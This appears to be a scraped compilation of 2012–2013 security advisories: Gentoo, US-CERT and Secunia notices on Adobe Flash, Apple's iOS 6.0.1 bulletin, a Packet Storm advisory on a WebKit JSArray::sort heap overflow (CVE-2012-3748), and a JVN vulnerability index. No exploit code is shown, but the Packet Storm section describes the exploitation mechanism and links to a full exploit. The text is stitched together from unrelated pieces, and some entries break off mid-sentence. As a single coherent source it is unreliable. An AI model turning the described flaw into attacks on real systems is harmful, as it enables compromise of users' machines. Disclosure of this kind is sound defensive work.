http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0648 [ 75 ] CVE-2013-0649 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0649 [ 76 ] CVE-2013-0650 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0650 [ 77 ] CVE-2013-1365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1365 [ 78 ] CVE-2013-1366 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1366 [ 79 ] CVE-2013-1367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1367 [ 80 ] CVE-2013-1368 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1368 [ 81 ] CVE-2013-1369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1369 [ 82 ] CVE-2013-1370 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1370 [ 83 ] CVE-2013-1371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1371 [ 84 ] CVE-2013-1372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1372 [ 85 ] CVE-2013-1373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1373 [ 86 ] CVE-2013-1374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1374 [ 87 ] CVE-2013-1375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1375 [ 88 ] CVE-2013-1378 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1378 [ 89 ] CVE-2013-1379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1379 [ 90 ] CVE-2013-1380 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1380 [ 91 ] CVE-2013-2555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2555 [ 92 ] CVE-2013-2728 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2728 [ 93 ] CVE-2013-3343 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3343 [ 94 ] CVE-2013-3344 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3344 [ 95 ] CVE-2013-3345 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3345 [ 96 ] CVE-2013-3347 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3347 [ 97 ] CVE-2013-3361 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3361 [ 98 ] CVE-2013-3362 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3362 [ 99 ] CVE-2013-3363 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3363 [ 100 ] CVE-2013-5324 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5324 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201309-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . Please send email to <cert@cert.org> with "TA13-043A Feedback VU#689711" in the subject. ____________________________________________________________________ Produced by US-CERT, a government organization. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Adobe Flash Player / AIR Multiple Vulnerabilities SECUNIA ADVISORY ID: SA52166 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52166/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52166 RELEASE DATE: 2013-02-12 DISCUSS ADVISORY: http://secunia.com/advisories/52166/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/52166/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=52166 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Flash Player and AIR, which can be exploited by malicious people to disclose certain sensitive information and compromise a user's system. 1) Some unspecified errors can be exploited to cause buffer overflows. 2) Some use-after-free errors can be exploited to dereference already freed memory. 4) An unspecified error can be exploited to corrupt memory. 5) An unspecified error can be exploited to corrupt memory. 6) An unspecified error can be exploited to disclose certain sensitive information. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: 1, 2, 5) The vendor credits Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna, Google 3) The vendor credits Natalie Silvanovich, BlackBerry Security, Research in Motion 4) The vendor credits Damian Put via iDefense 6) Reported by the vendor. ORIGINAL ADVISORY: Adobe (APSB13-05): http://www.adobe.com/support/security/bulletins/apsb13-05.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
var-201211-0319 Race condition in WebKit in Apple iOS before 6.0.1 and Safari before 6.0.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving JavaScript arrays. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Array objects. When splicing a sparse array, the size of a sparse array is not properly validated. In addition, parameters checked at the beginning of a function are never again validated despite being modified later on. By abusing this behavior an attacker can ensure this memory is under control and leverage the situation to achieve remote code execution. WebKit is prone to remote code-execution vulnerability. Failed exploit attempts may result in a denial-of-service condition. WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome. A race condition vulnerability exists in WebKit in Apple iOS versions prior to 6.0.1 and Safari versions prior to 6.0.2. CVE-ID CVE-2012-3748 : Joost Pol and Daan Keuper of Certified Secure working with HP TippingPoint's Zero Day Initiative Installation note: Apple TV will periodically check for software updates. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-11-01-1 iOS 6.0.1 iOS 6.0.1 is now available and addresses the following: Kernel Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Maliciously crafted or compromised iOS applications may be able to determine addresses in the kernel Description: An information disclosure issue existed in the handling of APIs related to kernel extensions. Responses containing an OSBundleMachOHeaders key may have included kernel addresses, which may aid in bypassing address space layout randomization protection. This issue was addressed by unsliding the addresses before returning them. CVE-ID CVE-2012-3749 : Mark Dowd of Azimuth Security, Eric Monti of Square, and additional anonymous researchers Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A person with physical access to the device may be able to access Passbook passes without entering a passcode Description: A state management issue existed in the handling of Passbook passes at the lock screen. This issue was addressed through improved handling of Passbook passes. CVE-ID CVE-2012-3750 : Anton Tsviatkou WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A time of check to time of use issue existed in the handling of JavaScript arrays. This issue was addressed through additional validation of JavaScript arrays. CVE-ID CVE-2012-3748 : Joost Pol and Daan Keuper of Certified Secure working with HP TippingPoint's Zero Day Initiative WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A use after free issue existed in the handling of SVG images. This issue was addressed through improved memory handling. CVE-ID CVE-2012-5112 : Pinkie Pie working with Google's Pwnium 2 contest Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "6.0.1". Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJQkZabAAoJEPefwLHPlZEwr00P/204OjJMiHe2I/bhwLanLfxw NEm7Ds0rBTZo7pA2mjeabUO1QpjeIZptMxtAD3p769KVd+eF9NO8ap3OaKzzhb2B uKvaiyLRcUG0mQh87e0K9hiZdU6N8yyBpoodK4/7vJFVDqxqlanmS/ewIPtG+a4L aIZcuy7ats8djpTd2tjVUGHhvtkX5exzU8+/F+ajISYMxQqYa26sAvAobJTvQWAx v9fanfgpE+hVXSH879yJlHIh7H64YhA8M+qQEzW2fz/YRXP/YC2tlFxvVUzB5Lyj uR2ER9MLi02rbJQbYzMEooWq2niPlh+c2LG+5KAqCGUGHWomTbeWui/yS27uQLrJ sbkpkaZuJPL5d1Mn9x70hlWyB6jpbfwsBw+H9XPYtHk1YhslYofNCdShJc8RNtME NSXjU2MBnga1KcQI9Kyyt6OfmGYqRKWqcX+xPuPhKdTCM3S4c6M1UgiVJgeQh5+f Wu87jgZ45CSiu28M2XN6wNKJflhrGpxBYdIGJHsYxu9lfh3WUFpr14NFpe//MChS Xhtiq9Neo+UqcYH1xV40FESHRy3iSe3jj2kJceUxvu0juLEdkYZu4aVp+2nCQokl akQ7iOvcE4l42LpO9GiVfo2PgtyH4vq5gyzpWRWtjhi3F6HDWY3yFBciYlzy0qsu am5QBITYy5QuxM/Pg+MO =eLYi -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 +------------------------------------------------------------------------------+ | Packet Storm Advisory 2013-0903-1 | | http://packetstormsecurity.com/ | +------------------------------------------------------------------------------+ | Title: Apple Safari Heap Buffer Overflow | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/03 | | Advisory Contact | Packet Storm (advisories@packetstormsecurity.com) | | Researcher | Vitaliy Toropov | +--------------------+---------------------------------------------------------+ | System Affected | Apple Safari | | Versions Affected | 6.0.1 for iOS 6.0 and OS X 10.7/8, possibly earlier | | Related Advisory | APPLE-SA-2012-11-01-2 | | Related CVE Number | CVE-2012-3748 | | Vendor Patched | 2012/11/01 | | Classification | 1-day | +--------------------+---------------------------------------------------------+ +----------+ | OVERVIEW | +----------+ The release of this advisory provides exploitation details in relation to a known patched vulnerability in Apple Safari. These details were obtained through the Packet Storm Bug Bounty program and are being released to the community. +------------------------------------------------------------------------------+ +---------+ | DETAILS | +---------+ The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption. The exploit for this vulnerability is a JavaScript code which shows how to use it for memory corruption of internal JS objects (Unit32Array and etc.) and subsequent arbitrary code execution (custom ARM/x64 payloads can be pasted into the JS code). +------------------------------------------------------------------------------+ +------------------+ | PROOF OF CONCEPT | +------------------+ The full exploit code is available here: http://packetstormsecurity.com/files/123088/ +------------------------------------------------------------------------------+ +---------------+ | RELATED LINKS | +---------------+ http://lists.apple.com/archives/security-announce/2012/Nov/msg00001.html http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3748 +------------------------------------------------------------------------------+ +----------------+ | SHAMELESS PLUG | +----------------+ The Packet Storm Bug Bounty program gives researchers the ability to profit from their discoveries. You can get paid thousands of dollars for one day and zero day exploits. In certain contexts, an active network attacker could present untrusted certificates to iTunes and they would be accepted without warning. CVE-ID CVE-2012-2824 : miaubiz CVE-2012-2857 : Arthur Gerkis CVE-2012-3748 : Joost Pol and Daan Keuper of Certified Secure working with HP TippingPoint's Zero Day Initiative CVE-2012-5112 : Pinkie Pie working with Google's Pwnium 2 contest CVE-2013-0879 : Atte Kettunen of OUSPG CVE-2013-0912 : Nils and Jon from MWR Labs working with HP TippingPoint's Zero Day Initiative CVE-2013-0948 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2013-0949 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2013-0950 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2013-0951 : Apple CVE-2013-0952 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2013-0953 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2013-0954 : Dominic Cooney of Google and Martin Barbella of the Google Chrome Security Team CVE-2013-0955 : Apple CVE-2013-0956 : Apple Product Security CVE-2013-0958 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2013-0959 : Abhishek Arya (Inferno) of the Google Chrome Security Team CVE-2013-0960 : Apple CVE-2013-0961 : wushi of team509 working with iDefense VCP CVE-2013-0991 : Jay Civelli of the Chromium development community CVE-2013-0992 : Google Chrome Security Team (Martin Barbella) CVE-2013-0993 : Google Chrome Security Team (Inferno) CVE-2013-0994 : David German of Google CVE-2013-0995 : Google Chrome Security Team (Inferno) CVE-2013-0996 : Google Chrome Security Team (Inferno) CVE-2013-0997 : Vitaliy Toropov working with HP TippingPoint's Zero Day Initiative CVE-2013-0998 : pa_kt working with HP TippingPoint's Zero Day Initiative CVE-2013-0999 : pa_kt working with HP TippingPoint's Zero Day Initiative CVE-2013-1000 : Fermin J. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Apple Safari Two Vulnerabilities SECUNIA ADVISORY ID: SA51157 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51157/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51157 RELEASE DATE: 2012-11-02 DISCUSS ADVISORY: http://secunia.com/advisories/51157/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/51157/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=51157 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Two vulnerabilities have been reported in Apple Safari, which can be exploited by malicious people to compromise a user's system. 2) A use-after-free error exists in the handling of SVG images. For more information see vulnerability #1 in: SA50954 The vulnerabilities are reported in versions prior to 6.0.2 running on OS X Lion and OS X Mountain Lion. PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Joost Pol and Daan Keuper, Certified Secure via ZDI ORIGINAL ADVISORY: APPLE-SA-2012-11-01-2: http://support.apple.com/kb/HT5568 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
jvndb-2022-000014 Multiple vulnerabilities in a-blog cms 2022-02-18T15:55+09:00 2022-02-18T15:55+09:00
jvndb-2022-000012 Multiple vulnerabilities in phpUploader 2022-02-17T15:20+09:00 2022-02-17T15:20+09:00
jvndb-2022-000011 HPE Agentless Management registers unquoted service paths 2022-02-09T15:49+09:00 2022-02-09T15:49+09:00
jvndb-2022-001299 Cross-site Scripting Vulnerability in JP1/IT Desktop Management 2 2022-02-08T17:15+09:00 2022-02-08T17:15+09:00
jvndb-2022-000009 CSV+ vulnerable to cross-site scripting 2022-02-08T16:33+09:00 2022-02-08T16:33+09:00
jvndb-2022-000010 Multiple vulnerabilities in multiple ELECOM LAN routers 2022-02-08T16:13+09:00 2022-02-08T16:13+09:00
jvndb-2016-008013 Multiple ESET products for macOS vulnerable to improper server certificate verification 2022-02-07T14:18+09:00 2022-02-07T14:18+09:00
jvndb-2022-000007 Multiple vulnerabilities in TransmitMail 2022-01-25T15:31+09:00 2022-01-25T15:31+09:00
jvndb-2022-001097 Multiple vulnerabilities in Trend Micro Deep Security and Cloud One - Workload Security Agent for Linux 2022-01-25T13:35+09:00 2022-01-25T13:35+09:00
jvndb-2022-001087 GROWI vulnerable to authorization bypass through user-controlled key 2022-01-24T14:07+09:00 2022-01-24T14:07+09:00
jvndb-2022-000006 Multiple cross-site scripting vulnerabilities in php_mailform 2022-01-20T15:42+09:00 2022-01-20T15:42+09:00
jvndb-2022-000001 Canon laser printers and small office multifunctional printers vulnerable to cross-site scripting 2022-01-19T14:00+09:00 2022-01-19T14:00+09:00
jvndb-2022-000005 PASSWORD MANAGER "MIRUPASS" PW10 / PW20 missing encryption 2022-01-13T15:26+09:00 2022-01-13T15:26+09:00
jvndb-2022-000004 Label printers "TEPRA" PRO SR5900P / SR-R7900P vulnerable to insufficiently protected credentials 2022-01-13T15:21+09:00 2022-01-13T15:21+09:00
jvndb-2022-000003 Jimoty App for Android uses a hard-coded API key for an external service 2022-01-12T15:37+09:00 2022-01-12T15:37+09:00
jvndb-2022-000002 Multiple vulnerabilities in WordPress Plugin "Quiz And Survey Master" 2022-01-12T15:33+09:00 2022-01-12T15:33+09:00
jvndb-2021-006117 Multiple vulnerabilities in IDEC PLCs 2021-12-27T16:54+09:00 2022-01-11T16:36+09:00
jvndb-2021-006146 Multiple vulnerabilities in KONICA MINOLTA MFPs and printing systems 2021-12-28T11:51+09:00 2021-12-28T11:51+09:00
jvndb-2021-006026 TP-Link TL-WR802N V4(JP) vulnerable to OS command injection 2021-12-24T15:31+09:00 2021-12-24T15:31+09:00
jvndb-2021-005998 Multiple vulnerabilities in QNAP VioStar NVR 2021-12-24T10:58+09:00 2021-12-24T10:58+09:00
jvndb-2021-003929 Multiple vulnerabilities in multiple Yamaha routers 2021-12-24T10:51+09:00 2021-12-24T10:51+09:00
jvndb-2021-000112 Android Apps developed using Yappli fails to restrict custom URL schemes properly 2021-12-22T15:07+09:00 2021-12-22T15:07+09:00
jvndb-2021-000111 Multiple vulnerabilities in GroupSession 2021-12-20T14:53+09:00 2021-12-21T14:20+09:00
jvndb-2021-000022 Multiple vulnerabilities in Cybozu Office 2021-03-15T15:56+09:00 2021-12-17T17:51+09:00
jvndb-2021-000093 Movable Type XMLRPC API vulnerable to OS command injection 2021-10-20T17:38+09:00 2021-12-17T17:36+09:00
jvndb-2021-000110 UNIVERGE DT Series vulnerable to missing encryption of sensitive data 2021-12-17T16:57+09:00 2021-12-17T16:57+09:00
jvndb-2021-005174 Multiple vulnerabilities in Trend Micro Security 2021 family (Consumer) 2021-12-09T13:43+09:00 2021-12-09T13:43+09:00
jvndb-2021-000107 Wi-Fi STATION SH-52A vulnerable to cross-site scripting 2021-11-30T14:49+09:00 2021-11-30T14:49+09:00
jvndb-2021-004716 Trend Micro Antivirus for MAC vulnerable to improper access controls 2021-11-29T13:52+09:00 2021-11-29T13:52+09:00
jvndb-2021-000106 Multiple vulnerabilities in baserCMS 2021-11-26T14:59+09:00 2021-11-26T14:59+09:00